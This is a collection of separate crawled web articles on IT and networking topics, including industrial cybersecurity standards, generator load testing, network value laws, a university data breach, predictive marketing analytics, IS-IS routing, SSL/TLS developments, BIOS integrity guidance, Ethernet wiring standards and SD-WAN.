In particular, the ISA/IEC 62443 standards contains seven foundational requirements for cybersecurity in modern production environments. These seven tenants cover:
- Identification and authentication control
- Use control
- System integrity
- Data confidentiality
- Restricted data flow
- Timely response to events
- Resource availability
Cybersecurity is a real threat today. The potential impact of a successful attack can be devastating. Robot suppliers and manufacturers alike have to be vigilant and prepared. All IIoT and automation equipment must take cybersecurity into account.
This article originally appeared on the Robotics Online Blog. Robotic Industries Association (RIA) is a part of the Association for Advancing Automation (A3), a CFE Media content partner. Edited by Chris Vavra, production editor, Control Engineering, CFE Media, email@example.com.
See additional cybersecurity regulation stories including:
Cybersecurity certification may soon be required for manufacturers
Strategic IT service company recognized by cybersecurity accreditation board | <urn:uuid:9f4dc1de-ab98-4eba-99f9-3ee0716ca4c4> | CC-MAIN-2022-40 | https://www.industrialcybersecuritypulse.com/iiot-cloud/improving-cybersecurity-in-robotic-automation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00793.warc.gz | en | 0.919618 | 658 | 2.890625 | 3 |
Have the details from your generator nameplate or data tag at the ready.
To specify the right equipment for the job, your chosen supplier is likely to ask you for the capacity rating of the generator you wish to test. This information can be found on the nameplate (or data tag) on the generator itself. The capacity rating will be specified in KVA and kW at a specified power factor and maximum output voltage.
The primary difference between kW (kilowatt) and kVA (kilovolt-ampere) is the power factor. kW is the unit of real power and kVA is a unit of apparent power (or real power plus reactive power). The power factor, unless it is defined and known, is therefore an approximate value (typically 0.8), and the kVA value will always be higher than the value for kW.
The nameplate will also have information on the voltage, operating phases and configuration of your generator, all of which will impact the load bank your supplier will specify. Having a photo of the nameplate on your mobile phone will mean you have all the information to hand when talking to your supplier. | <urn:uuid:c10b9765-40b1-4c65-ab77-0eae1231d889> | CC-MAIN-2022-40 | https://loadbanks.com/load-banks-day-4-of-5-have-the-details-from-your-generator-nameplate-or-data-tag-at-the-ready/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00793.warc.gz | en | 0.865097 | 233 | 2.640625 | 3 |
In the early years of networking, Bob Metcalfe set forth his famous law of networking that points out that the total value of a network grows by the square of the number of nodes (people or devices) that connect to it.
As time went on, networks grew, the dot-com world worked itself into a frothing frenzy, and Metcalfe’s Law seemed to promise utopia. Armed with hindsight, which is inherently unfair, the issue with any network value statement is that the potential value of a network increases at an unknown rate for each node added and, even if there is real value, the potential may not be realized either for the node or the overall network.
Additional nodes and networks added to an existing network do not necessarily guarantee value – positive or negative. A node could be silent, stealing value due to maliciousness or serviced by multiple networks wherein there are multiple logical addresses but only one physical device or service causing redundancy and the potential for overstatement in the real world.
Looking at the potential value of networks is interesting but an exact answer about value is impossible – only guesstimates are possible for a variety of reasons. The intent of this article is to spend a few minutes and examine the potential value of networks.
If you can bear with some math for just a moment, Metcalfe’s Law promised that the value of a network was n2-n, where “n” is the number of nodes. In the late 1990s, David Reed suggested the value was really 2^n. In 2005, Andrew Odlyzko and Benjamin Tilly suggested a formula of n log(n) because they viewed the previous two formulas as overstating value. Now, with reality setting in, we can look at these formulas through a different lens.
First, connections, value, price and cost are three fundamentally different concepts. Connections address how many different ways nodes can be connected – paths if you will.
Value is something that is assigned by a buyer of a good or service. It is subjective and fluctuates with time and the whims of the market.
Costs are outlays, both in economic and accounting terms, associated with running a business/organization and providing products and services. Lastly, price is what a product or service is attempted to be sold at and, like value, will fluctuate with the market.
Despite the rhetoric, there simply isn’t a direct correlation between nodes and value. There are too many real-world variables that enter in to accurately estimate value.
When we look at the network value formulas, we are not truly seeing value, price or cost – only potential connections. If we have 2^32 connections and all lack value, then the value of the total network is still only zero, but the potential could hold promise over a relatively smaller network of 2^16 connections given that all nodes have positive value.
Therein lies the first issue – value is cumulative. One high-value node can be far more worthwhile than several other nodes combined and a small network with relatively high-value nodes can be cumulatively worth more than a larger network of relatively lower-value nodes.
For that matter, we can safely assume that for any network, only 20% of the nodes will create 80% of the value. Conversely, we can also assume that the majority, or 80%, of the nodes will contribute very little value – perhaps 20%, if the 80/20 rule holds true.
While possible connections and potential values are interesting to contemplate, any formula aimed at ascertaining theoretical network potential value (NPV) can only go so far in the real world due to factors that impair incremental value or even create negative value for each additional node added.
This latter part is very concerning because of the possibility that some or all of the total value created could be destroyed following a curve more like a logistics growth curve that reaches an asymptotic peak with diminishing returns, but as the threats overwhelm the value, the tail end of the curve begins to fall at a rapid rate.
Thinking ahead, the challenge that we must come to grips with as a society is that any hope of attaining the NPV of the Internet, the largest digital network on the planet, necessitates a degree of globally coordinated care that has not been evidenced to date. | <urn:uuid:24d16ca6-c1c4-4f4d-aafd-e5a45d08fadc> | CC-MAIN-2022-40 | https://www.datamation.com/trends/fulfilling-the-internets-potential-value/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00793.warc.gz | en | 0.941796 | 890 | 2.609375 | 3 |
Other than the opportunity to learn and grow, if there’s one expectation placed on universities and colleges, it’s safety. Students, staff, and parents want to feel secure on campus and protected from physical and emotional harm.
Unfortunately, cybersecurity is becoming a growing source of insecurity at educational institutions across the nation.
What you need to know about the Georgia Tech breach
Recently, the Georgia Institute of Technology, commonly referred to as “Georgia Tech,” announced an investigation into what appears to be a massive data breach. As many as 1.3 million people, including past and current students, applicants, and staff, may be affected.
Last month, the school discovered a hack that may have exposed victims’ Social Security numbers and other personally identifiable information.
In the Cyber Security Notification posted on the university’s website, the college revealed:
“The information illegally accessed by an unknown outside entity was located on a central database. Georgia Tech’s cybersecurity team is conducting a thorough forensic investigation to determine precisely what information was extracted from the system, which may include names, addresses, Social Security numbers, and even birth dates.”
Breaches on the rise in the education industry
This marks the second data breach at the school in less than a year. Last July, Georgia Tech mistakenly emailed personal information for nearly 8,000 students to other students. Social Security numbers were not exposed in the first breach, but other personal information — including birth dates, phone numbers, and grade-point averages — was compromised.
Georgia Tech is far from alone.
Higher education institutions have come increasingly under attack in the past few years. Incidents were up by more than 100 percent in 2017, compared to 2016. And it’s not just large campuses.
Three private colleges — Oberlin, in Ohio; Grinnell, in Iowa; and Hamilton, in New York — all had their applicant databases hacked, according to a recent article in the Washington Post. That same week, a second report documented attacks on more than two dozen universities in the U.S. and elsewhere in an alleged attempt to steal military-related research.
Why the sudden upsurge in attacks?
Large-scale data breaches have hit a variety of large companies and institutions, including healthcare systems and financial firms. Why have colleges and universities become the next target of choice? More importantly, what steps can these organizations take to protect their employees?
A target-rich environment
The type of personal data stolen in the Georgia Tech case is gold on the dark web. Educational institutions typically request and store sensitive financial data and personally identifiable information like Social Security numbers and addresses for both students and their parents.
Cybercriminals can easily sell the information to identity thieves who open new lines of credit and financial accounts, drain existing bank accounts, and conduct other criminal acts. Further, the compromised data is often used to blackmail victims.
Who’s protecting the data?
Hacking into an individual server, even one housed at a tech-savvy institution, long ago became routine. That’s why cloud-based data storage seemed ideal for protecting sensitive information.
However, even if the third party hosting the data follows proper cybersecurity protocols, there is one variable they can’t control: human error. In fact, this is actually the number one cause of data breaches.
How can educational institutions protect their employees?
While identity thieves, hackers, and cybercriminals are targeting educational organizations in record numbers, there are steps universities can take to protect their employees.
If you’re a broker with clients in the education industry, you might start by reading our complimentary one-sheet, “How Identity Theft and Data Breaches Affect the Education Industry.” It’s loaded with important information you can use when speaking with clients about the risks of today’s digital era and arming them with the knowledge they need to protect their employees.
Are you an employer in the education industry? Consider reading our downloadable guide, “HR Guide to Employee Data Protection and Identity Theft Prevention.” It includes a number of tools and resources you can use to keep your employees safe.Need further assistance? That’s why we’re here. Feel free to contact us today. | <urn:uuid:beaa6dcb-f0e8-4e75-b09e-87325c5cd60e> | CC-MAIN-2022-40 | https://blog.infoarmor.com/security-professionals/what-the-latest-georgia-tech-data-breach-means-for-the-education-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00793.warc.gz | en | 0.946788 | 880 | 2.828125 | 3 |
The digital transformation of recent years has brought about a drastic change in handling and storing data. That's of a business and personal nature alike. Organizations worldwide are dealing with more data than ever before, and there's a pressing need for database solutions that are flexible, practical, and (perhaps most importantly of all) reliably secure.
A huge range of technologies are making effective use of the cloud and transforming how we all do business in the process. Just a couple of decades ago, who'd have thought that online meetings would be the ‘new normal’ for organizations across every sector of the business world? Yet thanks to the cloud and a VoIP service, it’s never been easier to reach out to colleagues and clients around the globe. And in what feels like no time at all, it’s become an everyday part of doing business.
Of late, many people have been asking just what cloud-native means for the technological infrastructure. Cloud-native technologies, including databases, have become increasingly commonplace. But what are cloud-native databases, and what exactly are their advantages?
Cloud-native databases: what are they?
In short, cloud-native databases are - as the name suggests - databases that are primarily cloud-based. As such, their deployment and delivery to clients are conducted via the cloud. They are designed to make the most effective use of cloud computing technology and the opportunities it provides. Most databases can be run using the cloud, but there are several things to consider first. Those include the purposes for which the database is required (i.e., what will be stored on it), its technological architecture, and the costs involved.
So, for example, you might think you have one of the best telemedicine platforms in the business. Without an adequate database system to back it up, though, you won't be able to deliver the goods effectively. For example, identifying and managing long-term conditions or understanding the role of lifestyle factors in causing or exacerbating illnesses. Both of which being processes that benefit from effective analysis of large data sets. Effective customer support is also similarly dependent on having robust databases in place.
Cloud-native databases are delivered through a platform as a service (PaaS) model, which makes managing and extracting data - as well as storing it - quite simple. These databases are set up by installing database software on top of a cloud infrastructure. They can be used for functions, including data storage, management, and extraction. Unlike most traditional databases, cloud-native databases can provide direct access and on-run time scalability. This allows for enhanced flexibility and elasticity. Now let’s look more closely at the advantages of choosing cloud-native databases.
Why choose cloud-native databases?
We’ve just touched on the fact that cloud-native databases can provide firms with improved elasticity. This is an important matter. For the uninitiated, elasticity is about how a system adapts to changing workload volumes by allocating resources according to the demand at any given time. The point is to maintain an appropriate balance of resource provision, avoiding both over-resourcing and under-resourcing. Through more efficient resource matching, cloud-native databases can deliver significant cost savings.
That’s not the only reason to choose a cloud-native database, however. There are many other advantages to doing so, including enhanced scalability and accessibility. Organizations that are ambitious about their growth targets - and serious about meeting them - need to be able to scale up quickly and responsively. They also need to have a database that can be accessed at any time and from anywhere. Cloud-native databases provide this kind of responsiveness and easy remote accessibility. They also offer storage that isn’t hampered by the constraints associated with traditional database solutions.
Of course, it goes without saying that ensuring data and network security is of the utmost importance for any organization. From HR software to customer privacy, businesses must ensure that they have robust measures in place to keep sensitive data out of the hands of hackers. Cloud-native databases are safeguarded by strong firewalls and anti-virus protection. They’re also subject to regular software updates (taking account of ongoing security threats) and stringent monitoring.
Geographic resilience is another crucial advantage of cloud-native databases. They are able to respond to any changes in the network to readjust themselves, making use of their clustering capacity. Relevant data can be delivered to users rapidly through automated cloud-native databases, detecting regional user patterns and thereby boosting performance. This automation also translates into low upfront costs and the more efficient deployment of human resources to manage databases. Combined, that can deliver sizable savings for customers. | <urn:uuid:71ffd676-ab9f-452b-b752-abba173ecf56> | CC-MAIN-2022-40 | https://www.networkcomputing.com/cloud-infrastructure/what-are-cloud-native-databases-and-why-should-you-use-them | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00793.warc.gz | en | 0.949018 | 960 | 2.53125 | 3 |
Predictive Data Analytics is the process of using historical and current data combined with machine learning to forecast certain outcomes. In the marketing world, predictive analytics uses monitoring and reporting to accurately plan strategies and campaigns. For nearly a decade, this type of marketing research has been changing the landscape of how organisations reach and impact their audiences.
Find better leads
Using the historical data of both a certain company and the industry a company is in, certain factors pertaining to sales leads can be found using Predictive Analytics. For instance, a financial advisory firm may find that individuals between the ages of 52 and 58 who exhibit certain behaviours on social media are significantly more likely to become clients.
Such indicators can be used in a number of ways including:
- Ad targeting
- Suggestive copywriting
- Lead prospecting
- Targeted sales conversations
Identify prospects faster
Many companies employ the use of a customer relationship management software (CRM). These tools typically include a way to score leads. Scoring is simply a numbering system to alert the marketing and sales team when a lead is close to making a decision. When this data is combined with machine learning and artificial intelligence, identifying sales-qualified leads becomes easier over time. Moreover, predictive analytics can be used to shorten the sales cycle by better predicting a leads behaviour when in the funnel.
When the process of identifying sales-qualified leads (SQLs) is done manually, there are many mistakes that can occur. For instance, if a lead downloads a certain resource it could trigger the marketing team to send that lead to sales. However, predictive analytics may tell you that a lead may have downloaded it too quickly and is not ready for a sales conversation.
Better align sales and marketing
Try as they might to understand one another, the marketing team and sales team have very different roles. More often than not, this results in a breakdown in communication that can cost a company revenue. The nature of predictive analytics is to improve over time. Data from both the sales and marketing team can improve multiple factors including:
- Handing off leads
- Communication of promotions (e.g. discounts)
- CRM implementation and updating
- Quality of leads in the funnel
Understand current customers
Many organisations rely on customer retention and add-on sales over the course of time. Retail banks, software-as-a-service companies, financial advisors and many others rely on customers sticking around for a long time. Predictive analytics helps to understand not only leads and new customers, but also the behaviours of existing clients. These factors influence marketing in a number of ways.
- Lead Generation: Certain leads may be easier to close than others. However, if those prospects end up leaving before they become profitable it won’t matter. By understanding the behaviours and attributes of clients, you can better target your lead generation efforts and acquire better long-term customers.
- New Products/Services: Predictive analytics can listen to your current client base. The data collected can be used to improve current products or even create new offers tailored specifically to predicted needs.
- Improve Referrals: Asking for referrals is an important part of any company’s lead generation. However, timing is often times unpredictable. With past behaviour and predictive analytics, understanding exactly when a customer is ready to refer you can be achieved.
Perhaps one of the most impactful ways predictive analytics will reshape the marketing world will be through automation. Once the behaviours of lucrative prospects are identified, sophisticated programs can interact with leads almost immediately.
Here are a few examples:
- A lead, who fits your buyer profile, tweets a keyword pertaining to your business. A software program automatically engages with that tweet from your Twitter account.
- A prospect comes to your website through organic search and your webpage offers a resource tailored to that specific user based upon their search criteria.
- Current leads in the funnel are monitored for social activity pertaining to your industry. Once certain behaviours occur your sales team is notified.
Better budget allocation
Improved understanding of who your buyers are, where you can find them and the resources to use to garner interest can all dramatically decrease ad spend waste. Overtime, predictive analytics can alert the marketing team to platforms (i.e., Facebook, AdWords) that are less effective as well as methods (i.e., video, cold email) that are not as likely to work. Conversely, the same predictions can be used to increase spending where efforts are likely to achieve the desired results.
Predictive data analytics is quickly becoming the driving force behind modern marketing. From drastically improving lead qualification to better aligning sales and marketing initiatives and making targeted marketing automation more in-tune with customers’ needs in-the-moment, predictive data analytics amplifies the ability to cater to individual customers – and that’s the magic formula for success in the modern marketing landscape.
Taj Nota, VP Professional Services UK, NGDATA (opens in new tab)
Image source: Shutterstock/ESB Professional | <urn:uuid:8a3419dd-0c01-4143-93d4-06b0a1c04e9e> | CC-MAIN-2022-40 | https://www.itproportal.com/features/six-ways-predictive-data-analytics-are-reshaping-marketing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00193.warc.gz | en | 0.935495 | 1,026 | 2.828125 | 3 |
In this chapter, you learned the basics of the OSI protocols and the IS-IS and Integrated IS-IS routing protocols. You also learned how to configure and troubleshoot Integrated IS-IS for IP on a Cisco router.
An IS is a router. A domain is any portion of an OSI network that is under a common administrative authority. Within any OSI domain, one or more areas can be defined. An area is a logical entity; it is formed by a set of contiguous routers and the data links that connect them. All routers in the same area exchange information about all the hosts that they can reach. The areas are connected to form a backbone. All routers on the backbone know how to reach all areas.
IS-IS is the dynamic link-state routing protocol for the OSI protocol stack. As such, it distributes routing information for routing CLNP data for the ISO CLNS environment.
Integrated IS-IS is an implementation of the IS-IS protocol for routing multiple network protocols; it is an extended version of IS-IS for mixed ISO CLNS and IP environments, or for IP only.
OSI network layer addressing is implemented with NSAP addresses that identify any system in the OSI network. If the NSEL field of the NSAP is 00, the NSAP refers to the device itselfthat is, it is the equivalent of the Layer 3 OSI address of that device. This address with the NSEL set to 00 is known as the NET. The NET is used by routers to identify themselves in the LSPs and, therefore, forms the basis for the OSI routing calculation. (The NET is a similar concept to the router identifier used by OSPF.)
Every IS-IS router requires an OSI address even if it is routing only IP. IS-IS uses the OSI address in the LSPs to identify the router, build the topology table, and build the underlying IS-IS routing tree.
It is important to note that IP information takes no part in the calculation of the SPF treeit is simply information about leaf connections to the tree.
Troubleshooting Integrated IS-IS, even in an IP-only world, requires some investigation of CLNS data. For example, the IS-IS neighbor relationships are established over OSI, not over IP. | <urn:uuid:06686995-9fde-4c88-b5dc-bd95627c9954> | CC-MAIN-2022-40 | https://www.ciscopress.com/articles/article.asp?p=31572&seqNum=6 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00193.warc.gz | en | 0.918432 | 482 | 3.734375 | 4 |
This post was originally published on the CA Security Council blog.
Looking Back at 2014
End of 1024-bit Security
In 2014, the SSL industry moved to issuing a minimum security of 2048-bit RSA certificates. Keys smaller than 2048 are no longer allowed in server certificates. In addition, Microsoft and Mozilla started to remove 1024-bit roots from their certificate stores. Hopefully, the key size change will support users through to 2030.
Push to Perfect Forward Secrecy
Following the Edward Snowden revelations of pervasive surveillance, there was a big push to configure web servers to support Perfect Forward Secrecy. For the most part, this is a reconfiguration of the ciphers to prefer those that support Diffie-Hellman Ephemeral (DHE). With perfect forward secrecy, a compromise of the server private key will not allow secured communications to be decrypted.
TLS Stack Issues
In 2014, issues were found with all TLS stacks and created some new stack versions. Apple had the Goto Fail bug where the certificate was not authenticated which could lead to a man-in-the-middle (MITM) attack.
GnuTLS, used in products such as Red Hat desktop/server and Debian and Ubuntu Linux distributions, also had an issue with improperly verifying digital certificates as authentic. The vulnerability allows an attacker to impersonate a trusted site and create a certificate that would be accepted by a user.
OpenSSL followed up with a security issue coined Heartbleed. With Heartbleed, an attacker could read the memory of the web server which may reveal the private key or end user passwords or data. XKCD depicted the issue quite nicely.
NSS crypto library had the BERserk bug, which impacted Mozilla products such as Firefox and Google Chrome. This vulnerability allows for attackers to forge RSA signatures and bypass authentication to SSL protected websites. Users on a compromised network could reveal passwords or download malware.
Microsoft completed the set with revealing a bug to Schannel later dubbed WinShock. This vulnerability grants code execution where an application such as Internet Explorer may be triggered by a component outside the protected environment. In the case of client targeted attack, it is easy to achieve control during normal browser exploitation which raises its severity.
The good news is that OpenBSD and Google are trying to raise the security of the TLS stacks by preparing their own versions. OpenBSD developed LibreSSL which is a cut-down version of OpenSSL. OpenBSD has tried to simplify by eliminating old code which supports legacy platforms.
Google also announced its version of OpenSSL called BoringSSL. Google is striving to keep SSL boring by deploying HTTPS without bugs.
Google SHA-1 Deprecation
Google advanced the schedule of SHA-1 deprecation. The industry was already working to the policy implemented by Microsoft where the certification authorities (CAs) would stop signing with SHA-1 in 2016 and Windows would stop supporting SHA-1 in 2017. Google supports the policy, but has also decided to provide warning indicators in Chrome as early as 2014 for SHA-1 signed certificates which will expire in 2016 or later. As a result, the CAs advanced communications to certificate customers to accelerate the migration to SHA-2.
Google also announced the POODLE vulnerability. With POODLE, an attacker can downgrade the SSL/TLS session to SSL 3.0. Once SSL 3.0 has been agreed, then through a padding oracle attack, it will allow items such as “secure” HTTP cookies or HTTP authorization header contents to be stolen. The result was the ability to use SSL 3.0 was removed from many servers and browsers. In addition, some servers were patched to prevent the fallback to SSL 3.0.
It was later revealed POODLE could also be used against the TLS versions of the protocol. In this case, padding was performed incorrectly in about 10 percent of the web servers. The impacted server vendors then had to release patches to mitigate POODLE.
To 2015 and Beyond
Early in 2014, Google announced Chrome would start supporting CT for EV SSL certificates in 2015. As a result, the CAs advanced their schedules and have implemented CT for all new EV SSL certificates. To support existing EV certificates, the CAs have provided these to Google which will be whitelisted for Chrome. As such, all EV certificates should be publicly logged in 2015.
The public logging will allow monitoring to be developed. Monitoring will provide domain owners the chance to see when an EV certificate has been issued with their domain. Moving forward we will see CT progressed through the IETF and a new RFC released sometime in the future. We may also see CT extended to support DV and OV SSL certificates.
The CA/Browser Forum has implemented a change to the SSL Baseline Requirements to require all CAs to disclose their policy on CAA by April 2015. Implementation of CAA will allow domain owners to specify their CA through DNS or DNSSec.
Code Signing Baseline Requirements
The CA/Browser Forum has advanced the development of the Code Signing Baseline Requirements. The draft requirements were provided for public review in the fall of 2014. The requirements will be updated and submitted for approval in 2015. The baseline requirements will provide direction to mitigate threats, such as private key protection, identity verification and threat detection.
Certificate Validity limited to 39 months
As of April 1, 2015, the maximum validity period of non-EV SSL certificates will be limited to 39 months as specified in the CA/Browser Forum SSL Baseline Requirements. The Baseline Requirements do allow for some exceptions where 60 month certificates can be issued. The reduction of validity periods will allow certificates with old requirements to expire on a timelier basis which will promote the web server to be upgraded with certificates that meet the latest requirements.
Stop Using Non-Registered Domains
As per the SSL Baseline Requirements, public trusted certificates with non-registered domain names will no longer be issued as of November 1, 2015. Any certificates with non-registered domain names that are still valid must be revoked by October 1, 2016.
Subscribers using these certificates are encouraged to change their systems to support registered domain names. If this is not possible, then consider using a dedicated CA or a service from a CA vendor with private trust. More information can be found in the CA Security Council whitepaper.
With the POODLE elimination of SSL 3.0 and the vulnerabilities of TLS 1.0 and 1.1, the best implementation of the SSL/TLS protocol is TLS 1.2. So what’s next? TLS 1.3 is on the horizon.
Hopefully in 2015 we will see the release of TLS 1.3 which will allow browser and server vendors to implement. We will also want to push for TLS 1.3 deployment in order to mitigate an attack against TLS 1.2. | <urn:uuid:e129724f-efbc-4c89-8101-b1f24848163d> | CC-MAIN-2022-40 | https://www.entrust.com/pt/blog/2015/01/2015-looking-back-moving-forward/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00193.warc.gz | en | 0.937536 | 1,413 | 2.578125 | 3 |
The routine is almost universal. Every day, millions of workers turn on their computers, take a second or two for a sip of coffee as their desktop or laptop “boots up,” and then get to work. In those few seconds, the basic input-output system (BIOS) of the computer loads the protocols that actually run the PC — in effect, acting the same as the shot of coffee that helps the worker wake up and start functioning. Pretty simple.
Only when it’s not.
Turns out that the BIOS function is yet another entry point for cybersecurity threats, to the degree that a federal agency has set up a program to deal with the problem and has asked for help from both the public and private sectors. The National Institute of Standards and Technology (NIST) has released the draft of a publication that provides guidance for vendors and security professionals as they work to protect personal computers in start-up mode.
The BIOS program is the first software that runs when a computer is turned on. It initializes the computer hardware before the operating system starts. Potential problems arise because it works at such a low level — before other security protections are in place — that unauthorized changes to the BIOS, either malicious or accidental, can cause a significant security threat.
“Unauthorized changes in the BIOS could allow or be part of a sophisticated, targeted attack on an organization, allowing an attacker to infiltrate an organization’s systems or disrupt their operations,” said Andrew Regenscheid, co-author of the NIST document.
The vulnerability is “an emerging threat area,” he warned, and the potential for harm underscores the importance of detecting changes to the BIOS code and configurations, and why monitoring BIOS integrity is an important element of security.
The NIST draft publication, “BIOS Integrity Measurement Guidelines,” explains the fundamentals of BIOS integrity measurement — a way to determine if the BIOS has been altered — and how to report any changes. The publication provides detailed guidelines for hardware and software vendors that develop products to support secure BIOS integrity measurement mechanisms. It may also be of interest to organizations that are developing deployment strategies for these technologies. The agency is seeking public comment on the publication through Jan. 20.
The emergence of the threat was highlighted by Symantec in company blog posts last year, and by NIST, which issued a document in April 2011 that provided manufacturing guidance for computer makers regarding BIOS threats. NIST has functioned as a vehicle to alert both hardware and software makers of cyberthreats and to provide technical guidance to help resolve problems.
Threat Level Viewpoints Differ
From a technical standpoint, launching a BIOS attack is not easy for Internet miscreants bent on spreading malware through computer systems, Symantec and NIST agree. But there is a difference in perspective about the future threat of BIOS attacks.
“The reality is that modern malware creators have not found BIOS attacks to be very attractive because of the diversity in legacy BIOS platforms, which tend to use non-standard proprietary designs,” Gerry Egan, director of Symantec Security Response, told CRM Buyer. “This makes a particular threat only useful against a subset of the community, which is not very attractive to everyday cybercriminals seeking the biggest bang for their buck.”
The knowledge required to create such an attack is arcane and poorly documented, Egan observed.
The infamous Stuxnet malware demonstrated that such obstacles as complexity become irrelevant if the attacker has a focused target and extensive resources, he noted — “so, the issue is real, but thus far not a materially significant one.”
NIST’s effort indicates a greater sense of urgency.
“Attacks on BIOS are relatively complex and must be highly targeted, so they have not been as prevalent as other attacks. Instead, most malware targets either the operating system or application running on a computer,” NIST’s Regenscheid told CRM Buyer.
“Over the years, some manufacturers have been taking steps to improve the security of BIOS, but the industry was not moving as quickly to strong security mechanisms as we would have liked, in part because there wasn’t a perceived need,” he said. “But targets and attacks are changing in response to improvements in operating systems and applications. Without security improvements, I think we will start seeing more attacks on BIOS.”
To some degree, that view is shared by McAfee in its 2012 report on potential cyberthreats.
“Attacking hardware and firmware is not easy, but success there would allow attackers to create persistent malware ‘images’ in network cards, hard drives, and even system BIOS,” the report points out. “We will keenly watch how attackers use these low-level functions for botnet control, perhaps migrating their control functions into graphics processor functions, the BIOS, or the master boot record.”
While computer vendors are ultimately responsible for BIOS security, according to Regenscheid, the entire hardware and software supply chain has a role to play in implementing the BIOS measurement protocol described by NIST.
“These vendors will each be responsible for different critical pieces of the overall BIOS integrity measurement system. And, of course, users and system administrators are responsible for setting up and configuring systems properly so that these mechanisms work as intended,” he said.
The NIST integrity measurement guidance is primarily intended for large organizations — either public or private. “While our documents are focused on computers intended for enterprise environments, we think some of these controls will migrate to consumer-level devices over time,” Regenscheid said.
Industry Reacted Quickly
However, actual invasion-protection mechanisms related to the BIOS at the computer manufacturing stage are not as challenging to implement as the detection and measurement protocols just outlined by NIST. As a result, large organizations have better capabilities to adopt the protocols, so adoption at the consumer level could take some time.
The industry reacted positively to the NIST “BIOS Protection Guidelines” issued in April last year, Regenscheid noted.
“That document helped call attention to this potential vulnerability, and the industry response has been amazing. Within a few months of publication, major computer vendors were already shipping products that were designed to meet the guidelines. I’m hopeful we’ll see a similar adoption of the ‘BIOS Integrity Measurement Guidelines,'” he said.
“I think there’s a role here for both NIST and industry standards groups. The NIST publications identify security requirements and properties that we think are important to have in computer systems to secure the BIOS. But we weren’t trying to design a solution. It’s up to industry and industry standards groups to determine how they will implement products that meet the guidelines,” Regenscheid stressed.
Organizations such as the Unified Extensible Firmware Interface Forum and the Trusted Computing Group will have a significant role in developing the necessary standards and specifications to create “secure and interoperable” solutions, he said. | <urn:uuid:1a269b84-6f36-4f08-bfba-271b8faa7b0d> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/us-cautions-on-boot-up-cyberthreat-74190.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00394.warc.gz | en | 0.944727 | 1,478 | 2.78125 | 3 |
T568A and T568B are the wiring standards that define the pinout (connection order) for terminating twisted-pair network cable in eight-pin modular connector plugs and jacks. These wiring standards are one part of the TIA/EIA-568 telecommunications cabling standards. The American National Standards Institute (ANSI), Telecommunications Industry Association (TIA), and Electronics Industries Alliance (EIA) are in agreement on the use of T568A and B.
Both standards specify the wiring schemes for the connection of twisted-pair copper cable into eight-position RJ45 connectors and jacks for data transmission. The twisted-pair cable is comprised of four wire pairs that provide eight conductors. The pairs feature blue, orange, green and brown colours. Each pair has a solid colour wire and another wire that is the same colour, with white stripes. Once the pairs are untwisted, eight separate wires are available to match the eight pins on a jack or plug.
The T568B Wiring Standard
In commercial environments, the T568B wiring standard is more commonly used for telecommunication installations. However, the 568A assignments are frequently seen in residential applications. Cabling expansions are made according to a network’s current wiring scheme in order for wires to match up and data signals to transmit. Both T568A and T568B wiring standards are straight-through schemes.
The Difference in T568B and T568A Wiring Schemes
The pair-to-pin assignments are different in the T568B and T568A wiring schemes. This difference is easily seen with pin positioning. The green and orange pairs (2 and 3) are switched. Patch cords can be purchased that are pre-wired for T568B or 568A connectivity.
Comms Express can provide additional information on these factory wired patch cables. | <urn:uuid:8813f393-9e2d-4d14-b8f1-f853f0b78cb6> | CC-MAIN-2022-40 | https://www.comms-express.com/infozone/article/t568a-and-t568b/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00394.warc.gz | en | 0.855034 | 379 | 2.984375 | 3 |
Software defined wide area network (SD-WAN) is a type of computer network that enables bonding of multiple internet access resources – such as DSL, cable, cellular or any other IP transport – to provide reliable high throughput data channels.
SD-WAN abstracts connectivity options – like multiprotocol label switching (MPLS), mobile and broadband – to create a virtual enterprise wide-area network (WAN).
An SD-WAN has a virtual WAN architecture and a software-driven technology. A key element of an SD-WAN is its centralized control, so that network connections, security mechanisms, policies, application flows and general administration are separated from the associated hardware.
For security considerations, data communications between offices are typically transmitted via VPN and funneled through the main office facility. It is critical to have a high-throughput IP tunnel that is reliable for this data connection. If a branch office uses a single DSL, T1 or cable modem connection to communicate with the headquarter office, there may be insufficient throughput and speed – especially for uploading data from the branch office to the main office. Similarly, a single broadband line at the branch office will not provide the adequate up-time that business-critical applications demand.
SD-WAN’s architecture enables a high-speed IP communication framework between a branch office and headquarters – as well as among branch offices – even over large geographic areas. The two devices form a transparent, high-speed data tunnel between them by combining access resources on each side.
A Wide Area Network (WAN) is simply a computer network that covers a large geographical area – usually encompassing a series of Local Area Networks (LANs). The connections can be telephone systems, leased lines or satellites.
With the proliferation of cloud services based on private and public clouds – as well as services that are heavily dependent on reliable and high-performance applications – businesses are sometimes maxing out the limitations of available WAN services. Although it may be economically feasible to provide high bandwidth internet connectivity to the main office, providing the same speed connections to each branch office is prohibitively expensive. There may be many branch offices and the available internet services might be limited or costly.
A software defined wide area network is a departure from the way a WAN is typically deployed and managed. An SD-WAN is a software-based technology that overlays onto an existing network. With an SD-WAN, the physical network is separate from the logical network. It splits the network from the management plane and disconnects the traffic management and monitoring tasks from the hardware. For instance, traditional WANs can only handle so many incoming connections to multiple cloud platforms. SD-WANs are not limited by the underlying hardware that makes up the network.
